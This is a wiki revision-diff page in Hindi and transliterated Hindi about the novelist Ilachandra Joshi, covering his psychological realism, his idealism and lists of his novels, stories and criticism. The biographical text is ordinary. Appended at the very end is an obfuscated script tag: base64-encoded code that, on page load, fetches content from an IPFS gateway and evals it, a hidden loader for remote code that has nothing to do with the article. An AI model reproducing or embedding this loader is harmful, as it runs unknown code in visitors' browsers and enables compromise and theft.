Difference between revisions of "इलाचन्द्र जोशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('<br /> (1903-1982)<br /> इलाचन्द्र जोशी का जन्म अल्मोड़ा में 1903 ...' के साथ नया पन्ना बनाया)
 
Line 5: Line 5:
 
जोशीजी ने अधिकांश साहित्यकारों की तरह अपनी साहित्यिक यात्रा काव्य-रचना से ही आरम्भ की। पर्वतीय-जीवन विशेषकर वनस्पतियों से आच्छादित अल्मोड़ा और उसके आस-पास के पर्वत-शिखरों ने और हिमालय के जलप्रपातों एवं घाटियों ने, झीलों और नदियों ने इनकी काव्यात्मक संवेदना को सदा जागृत रखा।
 
जोशीजी ने अधिकांश साहित्यकारों की तरह अपनी साहित्यिक यात्रा काव्य-रचना से ही आरम्भ की। पर्वतीय-जीवन विशेषकर वनस्पतियों से आच्छादित अल्मोड़ा और उसके आस-पास के पर्वत-शिखरों ने और हिमालय के जलप्रपातों एवं घाटियों ने, झीलों और नदियों ने इनकी काव्यात्मक संवेदना को सदा जागृत रखा।
 
==रचनाओं में मनोवैज्ञानिक यथार्थवाद==
 
==रचनाओं में मनोवैज्ञानिक यथार्थवाद==
 +
{{tocright}}
 
जोशी जी एक उपन्यासकार के रूप में ही अधिक प्रतिष्ठित हैं। उनके कवि, आलोचक या कहानीकार का रूप बहुत खुलकर सामने नहीं आया। इनके उपन्यासों का आधार मनोवैज्ञानिक यथार्थवाद की संज्ञा पाता है। मनोवैज्ञानिक उपन्यासों पर ‘फ़्रायड’ के चिन्तन का अधिक प्रभाव पड़ा, किन्तु इलाचन्द्र जोशी के साथ यह बात पूरी तरह से लागू नहीं होती। जोशी जी ने पाश्चात्य लेखकों को भी बहुत पढ़ा था, पर रूसी उपन्यासकारों-टॉल्स्टॉय और दॉस्तावसकी का प्रभाव अधिक लक्षित होता है। यही कारण है कि उनके औपन्यासिक चरित्रों में आपत्तिजनक प्रतृत्तियाँ होती हैं, किन्तु उनके चरित्र नायकों में सदगुणों की भी कमी नहीं होती। उदारता, दया, सहानुभूति आदि उनके अन्दर यथेष्ट रूप में पाए जाते हैं। ये नायक इन्हीं कारणों से असामाजिक कार्य भले कर बैठते हैं, किन्तु बाद में वे पश्चाताप भी करते हैं।
 
जोशी जी एक उपन्यासकार के रूप में ही अधिक प्रतिष्ठित हैं। उनके कवि, आलोचक या कहानीकार का रूप बहुत खुलकर सामने नहीं आया। इनके उपन्यासों का आधार मनोवैज्ञानिक यथार्थवाद की संज्ञा पाता है। मनोवैज्ञानिक उपन्यासों पर ‘फ़्रायड’ के चिन्तन का अधिक प्रभाव पड़ा, किन्तु इलाचन्द्र जोशी के साथ यह बात पूरी तरह से लागू नहीं होती। जोशी जी ने पाश्चात्य लेखकों को भी बहुत पढ़ा था, पर रूसी उपन्यासकारों-टॉल्स्टॉय और दॉस्तावसकी का प्रभाव अधिक लक्षित होता है। यही कारण है कि उनके औपन्यासिक चरित्रों में आपत्तिजनक प्रतृत्तियाँ होती हैं, किन्तु उनके चरित्र नायकों में सदगुणों की भी कमी नहीं होती। उदारता, दया, सहानुभूति आदि उनके अन्दर यथेष्ट रूप में पाए जाते हैं। ये नायक इन्हीं कारणों से असामाजिक कार्य भले कर बैठते हैं, किन्तु बाद में वे पश्चाताप भी करते हैं।
 +
 
==समाज में उच्चतर मूल्यों की स्थापना==  
 
==समाज में उच्चतर मूल्यों की स्थापना==  
 
जोशी जी मात्र मनोवैज्ञानिक यथार्थवादी उपन्यासकार नहीं कहे जाएँगे। उन्होंने आदर्श को भी अपनी कृतियों में स्थान दिया। उन्होंने अपनी औपन्यासिक कृतियों से समाज में उच्चतर मूल्यों की स्थापना का सफल प्रयास किया है। सही है कि उन्होंने काम वासना को भी अपने उपन्यासों का उपजीव्य बनाया है और वेश्याओं तक को अपनी कृतियों की नायिका बना दिया है। पर नारी-समस्याओं को उभारने में भी वे आगे रहे हैं और उनका समाधान भी प्रस्तुत किया है। एक बात यह भी है कि जोशी जी ने अन्य उपन्यासकारों अथवा नाटककारों की तरह अपनी कृतियों के लिए धीरोदत्त नायकों की सृष्टि नहीं की। उनके नायक मनुष्य की स्वाभाविक दुर्बलताओं से युक्त होते हैं, भले ही कालक्रम से वे अपने अधिकांश दोषों से मुक्त हो जाते हैं और एक आदर्श व्यक्ति के रूप में हमारे समक्ष प्रकट होते हैं।
 
जोशी जी मात्र मनोवैज्ञानिक यथार्थवादी उपन्यासकार नहीं कहे जाएँगे। उन्होंने आदर्श को भी अपनी कृतियों में स्थान दिया। उन्होंने अपनी औपन्यासिक कृतियों से समाज में उच्चतर मूल्यों की स्थापना का सफल प्रयास किया है। सही है कि उन्होंने काम वासना को भी अपने उपन्यासों का उपजीव्य बनाया है और वेश्याओं तक को अपनी कृतियों की नायिका बना दिया है। पर नारी-समस्याओं को उभारने में भी वे आगे रहे हैं और उनका समाधान भी प्रस्तुत किया है। एक बात यह भी है कि जोशी जी ने अन्य उपन्यासकारों अथवा नाटककारों की तरह अपनी कृतियों के लिए धीरोदत्त नायकों की सृष्टि नहीं की। उनके नायक मनुष्य की स्वाभाविक दुर्बलताओं से युक्त होते हैं, भले ही कालक्रम से वे अपने अधिकांश दोषों से मुक्त हो जाते हैं और एक आदर्श व्यक्ति के रूप में हमारे समक्ष प्रकट होते हैं।

Revision as of 05:32, 25 April 2011


(1903-1982)

ilachandr joshi ka janm almo da mean 1903 mean hua tha. hindi mean manovaijnanik upanyasoan ka arambh shri joshi se hi hota hai. joshiji ne adhikaansh sahityakaroan ki tarah apani sahityik yatra kavy-rachana se hi arambh ki. parvatiy-jivan visheshakar vanaspatiyoan se achchhadit almo da aur usake as-pas ke parvat-shikharoan ne aur himalay ke jalaprapatoan evan ghatiyoan ne, jhiloan aur nadiyoan ne inaki kavyatmak sanvedana ko sada jagrit rakha.

rachanaoan mean manovaijnanik yatharthavad

joshi ji ek upanyasakar ke roop mean hi adhik pratishthit haian. unake kavi, alochak ya kahanikar ka roop bahut khulakar samane nahian aya. inake upanyasoan ka adhar manovaijnanik yatharthavad ki sanjna pata hai. manovaijnanik upanyasoan par ‘frayad’ ke chintan ka adhik prabhav p da, kintu ilachandr joshi ke sath yah bat poori tarah se lagoo nahian hoti. joshi ji ne pashchaty lekhakoan ko bhi bahut padha tha, par roosi upanyasakaroan-t aaulst aauy aur d aaustavasaki ka prabhav adhik lakshit hota hai. yahi karan hai ki unake aupanyasik charitroan mean apattijanak pratrittiyaan hoti haian, kintu unake charitr nayakoan mean sadagunoan ki bhi kami nahian hoti. udarata, daya, sahanubhooti adi unake andar yathesht roop mean pae jate haian. ye nayak inhian karanoan se asamajik kary bhale kar baithate haian, kintu bad mean ve pashchatap bhi karate haian.

samaj mean uchchatar moolyoan ki sthapana

joshi ji matr manovaijnanik yatharthavadi upanyasakar nahian kahe jaeange. unhoanne adarsh ko bhi apani kritiyoan mean sthan diya. unhoanne apani aupanyasik kritiyoan se samaj mean uchchatar moolyoan ki sthapana ka saphal prayas kiya hai. sahi hai ki unhoanne kam vasana ko bhi apane upanyasoan ka upajivy banaya hai aur veshyaoan tak ko apani kritiyoan ki nayika bana diya hai. par nari-samasyaoan ko ubharane mean bhi ve age rahe haian aur unaka samadhan bhi prastut kiya hai. ek bat yah bhi hai ki joshi ji ne any upanyasakaroan athava natakakaroan ki tarah apani kritiyoan ke lie dhirodatt nayakoan ki srishti nahian ki. unake nayak manushy ki svabhavik durbalataoan se yukt hote haian, bhale hi kalakram se ve apane adhikaansh doshoan se mukt ho jate haian aur ek adarsh vyakti ke roop mean hamare samaksh prakat hote haian.

manovaijnanik upanyasakar ‘phrayad’ ke siddhantoan se prabhavit hote haian, bhale hi joshi ji ‘phrayad’ se bahut prabhavit nahian hoan. ek bat phir bhi rah hi jati hai ki joshi ji ne un manogranthiyoan aur kuanthaoan ko pak dane ka prayas kiya hai, jo damit manobhavoan se utpann hoti haian. yahi karan hai ki unaki aupanyasik kritiyoan mean kuantha-grast patroan ki adhikata hai. sahityakar nagendr ne inhean sidhe-sidhe ‘phrayad’ se prabhavit mana hai; jainendr aur ajney ‘phrayad’ ke manovijnan se prabhavit haian, to ilachandr joshi usake manovishleshan se......ve kahian bhi manovishleshanatmak pravritti aur chhayavadi sanskaroan se ubar nahian pate....inake mukhy patr kisi-n-kisi manovaijnanik granthi ke shikar haian. jab tak unhean granthi ka rahasy nahian maloom hota, tab tak ve anek prakar ke asamajik karyoan mean sanlagn rahate haian, kintu jis kshan unaki granthiyoan ka moolodaghatan ho jata hai, usi kshan se ve samany sthiti mean pahuanch jate haian.

hindi mean manovaijnanik upanyasoan ka prarambh shri joshi se hi hua, lekin shri joshi ne matr manovaijnanik yatharth ka niroopan n kar apani rachanaoan ko adarshaparak bhi banaya. jis tarah premachand samajik upanyasoan mean adarshoannmukh yatharthavad ke lie vikhyat haian, usi tarah shri ilachandr joshi manovaijnanik upanyasakaroan mean apani adarshavadi manovaijnanikata ke lie prashansaniy haian. unhoanne veshyaoan ki tarah tathakathit patit nariyoan mean bhi sudhar evan vikas ki sambhavanaean dhooandhian. inhean bhi mahimamandit kar inamean atmavishvas bharane aur samaj ki drishti mean inhean ooancha uthane ka prayas kiya.

rachanayean

  • upanyas ke atirikt inhoanne hindi sahity ki any vidhaoan mean bhi yogadan diya hai. inhoanne kahaniyaan bhi likhian. inake charchit kahani sangrah nimnalikhit haian-
  1. dhooparekha,
  2. ahuti,
  3. khandahar ki atmaean
  • inhoanne kuchh jivaniyaan bhi likhian, jinamean prasiddh haian-
  1. ravindranath
  2. sharad: vyakti aur sahityakar
  3. jivan ka mahan vishleshak viratavadi kavi gete
  • ilachandr joshi ne alochanatmak granth bhi likhe. inamean prasiddh haian-
  1. sahity sarjan,
  2. sahity chintan,
  3. vishleshan
  • joshi ji ne bal-sahity mean bhi ullekhaniy yogadan diya. kuchh anuvad kary bhi kie.
  • ve ek saphal sampadak bhi the. prayag se prakashit ‘sangam’ ka sampadan unhoanne saphalatapoorvak kiya. prasiddh patrika ‘dharmayug’ ka bhi sampadan unhoanne kuchh samay tak kiya.
  • ilachandr joshi ke pramukh upanyas is prakar haian-
  1. ghrinamayi - bad mean yahi upanyas ‘lajja’ nam se prakashit hua. ghrinamayi 1929 mean prakashit huee
  2. lajja 21 varshoan ke bad 1950 mean.
  3. sannyasi,
  4. parade ki rani,
  5. pret aur chhaya,
  6. muktipath,
  7. jipsi,
  8. jahaz ka panchhi,
  9. bhoot ka bhavishy,
  10. subah,
  11. nirvasit,
  12. rrituchakr.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>